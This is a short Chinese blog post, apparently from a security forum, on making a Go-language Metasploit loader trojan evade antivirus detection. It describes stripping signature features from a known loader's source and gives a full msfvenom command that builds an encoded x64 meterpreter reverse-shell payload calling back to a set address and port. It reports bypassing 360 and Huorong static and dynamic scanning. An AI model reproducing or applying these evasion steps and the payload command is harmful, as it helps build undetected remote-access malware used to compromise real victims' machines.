技术分享 | go语言源码免杀MSF木马

木马源码免杀两种形式：下载者和加载者
https://www.freebuf.com/articles/system/227468.html

前言

加载者的免杀分为两部分:

1. 加载器本身的免杀，加载器源码因为在网上发布许久。特征码已被查杀。
2. msf本身的shllcode免杀。需要对msf马进行多次混淆编码。

加载器免杀

这里我不放shellcode，看看网上加载器的特征会被多少AV识别。
在微步的VT 0/25

virustotal的VT 15/71


免杀的过了火绒，但是没过360。

接下来从源码级别看看能不能免杀加载器。

因为这个加载器放在freebuf很久了 360的肯定加入黑名单了。

对下载者做下改动,方便shellcode的填写。

把这个shellcode_buf删掉，火绒无报毒。说明这里是特征码之一。

将这个shellcode部分改写。

火绒无报毒，360无报毒 。

shellcode免杀

利用msfvenom进行多次编码绕过。

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor_dynamic -i 3 lhost=192.168.7.122 lport=6666 -f c

这里我选择的是 x64/xor_dynamic编码 因为是64的马，最好选择x64的编码。

-i 是次数 3



这里单纯的利用编码就可绕过火绒动静态查杀，火绒还是很容易绕过的。

360静态查杀报毒，说明360对msfvenom编码查杀严格一些。

利用go语言生成完整加载者木马免杀

将两者结合


可过360动静态免杀。

过火绒动静态。